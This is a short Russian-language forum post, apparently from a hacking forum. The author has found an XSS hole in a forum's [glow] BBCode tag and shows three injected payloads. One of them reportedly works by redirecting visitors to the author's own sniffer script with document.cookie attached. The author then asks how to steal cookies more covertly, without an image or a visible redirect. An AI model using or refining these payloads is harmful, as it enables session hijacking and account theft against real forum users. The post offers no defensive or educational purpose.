Ситуация такая - есть XSS
пробую юзать:
[glow=red);background:url(javascript:document.locat ion="http://мойсайт/сниф.php?"%20+document.cookie);filter:glow(col or=red,2,300] мое сообщение[/glow]
исполняется, но палевно очень, перебрасывая на сниффер.
другие вариации не прокатывают, я js не знаю, что можно вставить заместо document.location, как правильно заюзать?

например пробовал вот что:
[glow=red);background:url(javascript:document.write (img src= "http://**/*.php"+document.cookie); filter:glow(color=red,2,300]текст[/glow]
не катит

еще:[glow=red);background:url(javascript:new Image(); img.src = "http://***/*.php");filter:glow(color=red,2,300]текст[/glow] не катит


а простой алерт нормально прокатывает, подскажите плз, как сформировать, чтоб получить куки, при этом не вставляя как картинку